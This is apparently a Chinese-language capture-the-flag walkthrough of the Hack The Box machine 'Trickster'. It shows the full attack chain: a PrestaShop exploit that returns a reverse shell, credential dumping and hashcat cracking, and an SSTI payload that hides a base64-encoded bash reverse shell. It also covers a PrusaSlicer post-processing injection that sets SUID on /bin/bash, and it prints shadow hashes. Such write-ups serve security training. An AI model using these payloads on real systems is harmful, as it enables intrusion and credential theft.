Zumpyx Blog

Trickster

Machines#626MediumLinux

Tags: Prestashop、CVE-2024-34716、Hashcat、Docker、ChangeDetection.io、CVE-2024-32651、SSTI、Prusaslicer、CVE-2023-47268

Recon & Enum

nmap -p- --min-rate 1000 -T4 -sC -sV -O -v Trickster.htb
---
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: 403 Forbidden
ffuf -u http://trickster.htb/ -H 'Host: FUZZ.trickster.htb' -w subdomains.txt -fc 301
---
shop                    [Status: 403, Size: 283, Words: 20, Lines: 10, Duration: 152ms]
feroxbuster -u http://trickster.htb -s 200,301,403
---
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      315c http://trickster.htb/images => http://trickster.htb/images/
200      GET        2l       51w     1850c http://trickster.htb/assets/js/browser.min.js
200      GET      401l      738w     8035c http://trickster.htb/assets/js/main.js
200      GET       37l       80w      568c http://trickster.htb/assets/css/noscript.css
200      GET     1638l     3543w    34125c http://trickster.htb/assets/css/main.css
200      GET        2l       87w     2438c http://trickster.htb/assets/js/breakpoints.min.js
301      GET        9l       28w      315c http://trickster.htb/assets => http://trickster.htb/assets/
200      GET        2l     1283w    86927c http://trickster.htb/assets/js/jquery.min.js
200      GET     3386l    19800w  1485483c http://trickster.htb/images/pic01.jpg
200      GET        0l        0w  1747672c http://trickster.htb/images/pic03.jpg
200      GET        0l        0w  1733227c http://trickster.htb/images/pic02.jpg
200      GET      355l      927w    12683c http://trickster.htb/


feroxbuster -u http://shop.trickster.htb -s 200,301
---
301      GET        9l       28w      323c http://shop.trickster.htb/.git => http://shop.trickster.htb/.git/
200      GET     1423l     2799w    53083c http://shop.trickster.htb/registration   
200      GET     1043l     2429w    44981c http://shop.trickster.htb/password-recovery
200      GET     1155l     2446w    46524c http://shop.trickster.htb/login
200      GET     1051l     2357w    44464c http://shop.trickster.htb/search
200      GET     1071l     2387w    44984c http://shop.trickster.htb/guest-tracking     
200      GET     1102l     2444w    46217c http://shop.trickster.htb/cart
301      GET        9l       28w      322c http://shop.trickster.htb/pdf => http://shop.trickster.htb/pdf/

Shell as WWW-Data

https://github.com/liamg/gitjacker

ls -la
total 216
drwx------  4 kali kali    260 Dec 28 09:52 .
drwxrwxrwt 25 root root    540 Dec 28 12:18 ..
drwxr-xr-x  6 kali kali    240 Dec 28 10:28 .git
-rw-rw-r--  1 kali kali   1538 Dec 28 09:52 .php-cs-fixer.dist.php
-rw-rw-r--  1 kali kali   5054 Dec 28 09:52 INSTALL.txt
-rw-rw-r--  1 kali kali    522 Dec 28 09:52 Install_PrestaShop.html
-rw-rw-r--  1 kali kali 183862 Dec 28 09:52 LICENSES
-rw-rw-r--  1 kali kali    863 Dec 28 09:52 Makefile
drwxrwxr-x  8 kali kali    380 Dec 28 09:52 admin634ewutrx1jgitlooaj
-rw-rw-r--  1 kali kali   1305 Dec 28 09:52 autoload.php
-rw-rw-r--  1 kali kali   2506 Dec 28 09:52 error500.html
-rw-rw-r--  1 kali kali   1169 Dec 28 09:52 index.php
-rw-rw-r--  1 kali kali   1256 Dec 28 09:52 init.php

发现 Prestashop 后台登录界面 admin634ewutrx1jgitlooaj,搜索 Prestashop 漏洞 CVE-2024-34716

https://github.com/aelmokhtar/CVE-2024-34716

python3 exploit.py --url http://shop.trickster.htb/ --email [email protected] --local-ip 10.10.16.4 --admin-path admin634ewutrx1jgitlooaj
---
[X] Starting exploit with:
        Url: http://shop.trickster.htb/
        Email: [email protected]
        Local IP: 10.10.16.2
        Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
listening on [any] 12345 ...
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.10.11.34 - - [29/Dec/2024 19:23:32] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
connect to [10.10.16.2] from (UNKNOWN) [10.10.11.34] 56502
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 00:23:57 up  2:15,  0 users,  load average: 0.52, 0.25, 0.17
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Local Enum

<?php return array (                                                   
  'parameters' =>                                                      
  array (                                                                                                                                      
    'database_host' => '127.0.0.1',                             
    'database_port' => '',                                                                                                                     
    'database_name' => 'prestashop',                                   
    'database_user' => 'ps_user',                                      
    'database_password' => 'prest@shop_o',                      
    'database_prefix' => 'ps_',                                        
    'database_engine' => 'InnoDB',                                     
    'mailer_transport' => 'smtp',                                      
    'mailer_host' => '127.0.0.1',                                      
    'mailer_user' => NULL,                                             
    'mailer_password' => NULL,                                         
    'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
    'ps_caching' => 'CacheMemcache',
...

Shell as James

mysql -u ps_user -pprest@shop_o -D prestashop -e "select email,passwd from ps_employee"
---
+---------------------+--------------------------------------------------------------+
| email               | passwd                                                       |
+---------------------+--------------------------------------------------------------+
| [email protected] | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| [email protected] | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+---------------------+--------------------------------------------------------------+

hashcat -m 3200
---
$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm:alwaysandforever

hydra -L res/user.list -P res/pass.list ssh://trickster.htb
---
[22][ssh] host: trickster.htb   login: james   password: alwaysandforever

Shell as User2

State           Recv-Q          Send-Q                     Local Address:Port                      Peer Address:Port
LISTEN          0               128                              0.0.0.0:22                             0.0.0.0:*
LISTEN          0               4096                       127.0.0.53%lo:53                             0.0.0.0:*
LISTEN          0               4096                           127.0.0.1:45643                          0.0.0.0:*
LISTEN          0               80                             127.0.0.1:3306                           0.0.0.0:*
LISTEN          0               511                                    *:80                                   *:*
LISTEN          0               128                                 [::]:22                                [::]:*

image.png

先做个端口转发,这个高位端口没发现什么东西

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:b7:83 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.34/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:c1:aa:f9:80 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
19: veth6a53c87@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 72:89:0e:9c:e7:64 brd ff:ff:ff:ff:ff:ff link-netnsid 0

看到有 docker 的虚拟网卡,扫描一下有没有 docker 服务

# 存活主机 C 段扫描
BASE_IP=172.17.0; TIMEOUT=1; for i in $(seq 254); do (if ping -c 1 -W 0.5 $BASE_IP.$i 2>&1 >/dev/null; then echo "[+] $BASE_IP.$i Up"; else echo -ne "\r[?] $BASE_IP.$i\r"; fi &) done; sleep $TIMEOUT; tput el
---
[+] 172.17.0.1 Up
[+] 172.17.0.2 Up

# 端口扫描,顺序:1-1000、10000、65535
IP=172.17.0.2; for i in `seq 10000`; do (if (echo > /dev/tcp/$IP/$i) 2>/dev/null; then echo "[+] $IP:$i Open "; else echo -ne "\r[?] $IP:$i Scan\r"; fi &); done; sleep 1; tput el
---
[+] 172.17.0.2:5000 Open

# 端口转发
ssh -L 127.0.0.1:5000:172.7.0.2:5000 [email protected] 

Shell as Adam

![image.png](./assets/0626-trickster/image 1.png)

![image.png](./assets/0626-trickster/image 2.png)

发现一个 ChangeDetection.io 服务,可以使用 James 的凭据 alwaysandforever 登录,刚好满足 CVE-2024-32651 的版本要求

网上的大部分 Exp 是对未授权访问写的,这里需要手动调整一下,或者手动利用

![image.png](./assets/0626-trickster/image 3.png)

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjQvMjIzMyAwPiYxJwo= | base64 -d | bash').read() }}

![image.png](./assets/0626-trickster/image 4.png)

![image.png](./assets/0626-trickster/image 5.png)

在 Docker 中发现了两个文件 /datastore/Backups/changedetection-backup-*.zip 先下载到本地

![image.png](./assets/0626-trickster/image 6.png)

这里的 .br 文件需要使用 brotli 解压缩,brotli -d [file]

...
                'database_host' => '127.0.0.1' ,
                'database_port' => '' ,
                'database_name' => 'prestashop',
                'database_user' => 'adam',
                'database_password' => 'adam_admin992',
                'database_prefix' => 'ps_' ,
                'database_engine' => 'InnoDB' ,
...

发现 adam / adam_admin992

Local Enum

sudo -l
Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

Shell as Root

prusaslicer 是一个 3D 打印相关的工具,那么很有可能会出现 PDF 处理等类似的漏洞,searchsploit 搜索找到 CVE-2023-47268

![image.png](./assets/0626-trickster/image 7.png)

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268

==========================================================================================
1.) 3mf Metadata extension
==========================================================================================

PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way.

==========================================================================================
2.) PoC
==========================================================================================

For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

; post_process = “/usr/bin/id > /tmp/hax #\necho ‘Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)’>> /tmp/hax #”


Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.

For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry:

; post_process = “C:\Windows\System32\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) “

大致利用方法就是,解包 3mf 文件后在 Slic3r_PE.config 中配置 ; post_process = “/usr/bin/id” 就可以执行命令了

# 目标机器给了一个 3mf 文件可以使用 /opt/PrusaSlicer/TRICKSTER.3mf
unzip TRICKSTER.3mf -d TRICKSTER
---
Archive:  TRICKSTER.3mf
  inflating: TRICKSTER/[Content_Types].xml  
  inflating: TRICKSTER/Metadata/thumbnail.png  
  inflating: TRICKSTER/_rels/.rels   
  inflating: TRICKSTER/3D/3dmodel.model  
  inflating: TRICKSTER/Metadata/Slic3r_PE.config  
  inflating: TRICKSTER/Metadata/Slic3r_PE_model.config

tree
---
.
├── 3D
│   └── 3dmodel.model
├── Metadata
│   ├── Slic3r_PE.config
│   ├── Slic3r_PE_model.config
│   └── thumbnail.png
├── [Content_Types].xml
└── _rels

# 需要修改两处,output_filename_format 如果不修改,执行会报错
; output_filename_format = out.gcode
; post_process = "chmod u+s /bin/bash"

# 然后在重新打包,注意要在刚刚解包在的 TRICKSTER 目录来保证各个文件的索引位置
zip -r TRICKSTER.3mf *

curl http://10.10.16.2/TRICKSTER.3mf -o TRICKSTER.3mf

sudo /opt/PrusaSlicer/prusaslicer -s TRICKSTER.3mf
---
10 => Processing triangulated mesh
10 => Processing triangulated mesh
20 => Generating perimeters
20 => Generating perimeters
30 => Preparing infill
45 => Making infill
30 => Preparing infill
45 => Making infill
10 => Processing triangulated mesh
20 => Generating perimeters
30 => Preparing infill
45 => Making infill
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
65 => Searching support spots
69 => Alert if supports needed
print warning: Detected print stability issues:

Loose extrusions
Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere

Collapsing overhang
Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere

Low bed adhesion
TRICKSTER.HTB, Shape-Sphere, Shape-Sphere, Shape-Sphere, Shape-Sphere

Consider enabling supports.
Also consider enabling brim.
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Estimating curled extrusions
88 => Generating skirt and brim
90 => Exporting G-code to out.gcode
Slicing result exported to out.gcode

![image.png](./assets/0626-trickster/image 8.png)

More and More

这个 Box 比较需要经验,两次横向需要翻文件,最后提权还是个陌生的 3D,总体差评。

docker ps
---
CONTAINER ID   IMAGE                    COMMAND                  CREATED        STATUS          PORTS      NAMES
a4b9a36ae7ff   changedetection:latest   "python ./changedete…"   3 months ago   Up 15 minutes   5000/tcp   changedetection.io

Dump Hash

root:$y$j9T$oH3O1lHmDWiZbB909qnHG1$DMJpaZJ42dQYhNLqrKCCda5bhgFNlrdgQHgZV69KpZ3:19992:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19866:0:99999:7:::
james:$y$j9T$nFUssQJghJkY44BaQM2aD1$E9pJTfQ5CwEkaU/7O07HAh.4UsM1lOhKHqyRP1XEtL4:19868:0:99999:7:::
lxd:!:19866::::::
mysql:!:19866:0:99999:7:::
adam:$y$j9T$BUeIuw29kb15rDAz8ZXOt/$WG54Q2KcL9UI.zK0r2WaeXb6zUQioT1HBxJ0TfjF736:19868:0:99999:7:::
dnsmasq:*:19866:0:99999:7:::
runner:$y$j9T$1GBk1cQSxkwCXeThdrzvp.$.q2JbGTK0oFJG0aMtLjaVoRiv5419bO0gOC9mTJO2iB:19975:0:99999:7:::
_laurel:!:19979::::::
postfix:*:19983:0:99999:7:::